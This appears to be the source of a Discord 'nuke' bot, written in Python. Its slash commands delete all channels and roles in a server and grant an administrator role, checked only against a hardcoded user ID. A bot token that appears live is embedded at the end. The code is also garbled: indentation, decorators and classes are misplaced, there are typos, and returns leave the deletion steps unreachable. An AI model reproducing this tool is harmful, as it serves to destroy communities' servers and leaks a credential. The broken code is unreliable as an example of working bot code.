import discord
from discord import app_commands
from discord.ext import commands

intents = discord.Intents.default()
intents.guilds = True

bot = commands.Bot(command_prefix="!", intents=intents)


class ConfirmChannels(discord.ui.View):
    def __init__(self):
        super().__init__(timeout=30)

    @discord.ui.button(label="CONFIRM", style=discord.ButtonStyle.danger)
    async def confirm(self, interaction, button:
         discord.ui.Button):
             if not await bot.is_owner(interaction.user):
                 await interaction.response.send_message("not allowed",
                 ephemeral=True)
                 return

             await interaction.response.send_message("deleting all channels...",
             ephemeral=True)

             for channel in interaction.guild.channels:
                 try:
                   await channel.delete()
                 except:
                         pass

                 @discord.ui.button(label="CANCEL", style=discord.ButtonStyle.secondary)
                 async def cancel(self, interaction: discord.Interaction, button:
                         discord.ui.Button):
                             await interaction.response.send_message("cancelled", ephemeral=True)


    class ConfirmRoles(discord.ui.View):
      def __init__(self, interaction):
            super().__init__(timeout=30)
            self, interaction = interaction

            @discord.ui.buttin(label="CONFIRM", style=discord.ButtonStyle.danger)
            async def confirm(self, interaction: discord.Interaction, button:
                discord.ui.Button):
                if not await bot.is_owner(interaction.user):
                        await interaction.response.send_message("not allowed",
                        ephemeral=True)
                        return

                await interaction.response.send_message("deleting all roles..",
          ephemeral=True)
                return


                await interaction.response.send_message("deleting all roles...",
      ephemeral=True)

                for role in interaction.guild.roles:
                 if role.is_default():
                    continue
                    try:
                        await role.delete()
                    except:
                        pass

    @discord.ui.button(label="CANCEL", style=discord.ButtonStyle.secondary)
    async def cancel(self, interaction: discord.Interaction, button:
                  discord.ui.Button):
           await interaction.response.send_message("cancelled", ephemeral=True)


class ConfirmAdmin(discord.ui.View):

            def __init__(self, member):
                       super().__init__(timeout=30)
                       self.member = member

@discord.ui.button(label="CONFIRM", style=discord.ButtonStyle.danger)
async def confirm(self, interaction: discord.Interaction, button:
                           discord.ui.Button):
                               if not await bot.is_owner(interaction.user):
                                   await interaction.response.send_message("not allowed",
                                   ephemeral=True)
                                   return

                               guild = interaction.guild
                               admin_role = discord.utils.get(guild.roles, name="admin")

                               if admin_role is None:
                                   admin_role = await guild.create_role(
                                       name="admin",
                                       permissions=discord.Permissions(administrator=True)
                                       )

                                   await self.member.add_roles(admin_role)
                                   await interaction.response.send_message(
                                    f"admin given to {self.member}",
                                    ephemeral=True
                                    )

@discord.ui.button(label="CANCEL", style=discord.ButtonStyle.secondary)
async def cancel(self, interaction: discord.Interaction,button:
                                        discord.ui.Button):
                                            await interaction.response.send_message("cancelled",
                                            ephemeral=True
                                            )


@bot.event
async def on_ready():
                                await bot.tree.sync()
                                print("bot online and slash command synced")


@bot.tree.command(name="nuke_channels", description="delete all channels")
async def nuke_channels(interaction: discord.Interaction):

    if interaction.user.id != 1420177882659033221:
        await interaction.response.send_message(
            "ur not allowed to use this bot lol",
            ephemeral=True
        )
        return

        await interaction.response.send_message(
                                    "ARE U SURE U WANT TO DELETE ALL CHANNELS?",
                                    view=ConfirmChannels(),
                                    ephemeral=True
                                    )


@bot.tree.command(name="nuke_roles", description="delete all roles")
async def nuke_roles(interaction: discord.Interaction):

    if interaction.user.id != 1420177882659033221:
        await interaction.response.send_message(
            "ur not allowed to hse this boy 😂👦",
            ephemeral=True
        )
        return

        await interaction.response.send_message(
                                            "ARE U SURE U WANNA DELETE ALL ROLES?",
                                            view=ConfirmRoles(interaction),
                                             ephemeral=True,
                                            )



@bot.tree.command(name="give_admin", description="gives admjn to a memeber")
async def give_admin(
    interaction: discord.Interaction,
    member: discord.Member
    ):

    if interaction.user.id != 1420177882659033221:
        await interaction.response.send_message(
            "ir not alloweds to use this",
            ephemeral=True
        )
        return

    await interaction.response.send_message(
        f"admin given to {member}",
        ephemeral=True
        )

@bot.event
async def on_ready():
    print("Bot online")



bot.run("MTQ2MjAyNjUyOTM1NjkxMDczMA.GAKHbK.dli5MznPxZS4_iLBxmgFUWjlMWg1Z6Kl4KXVy8")
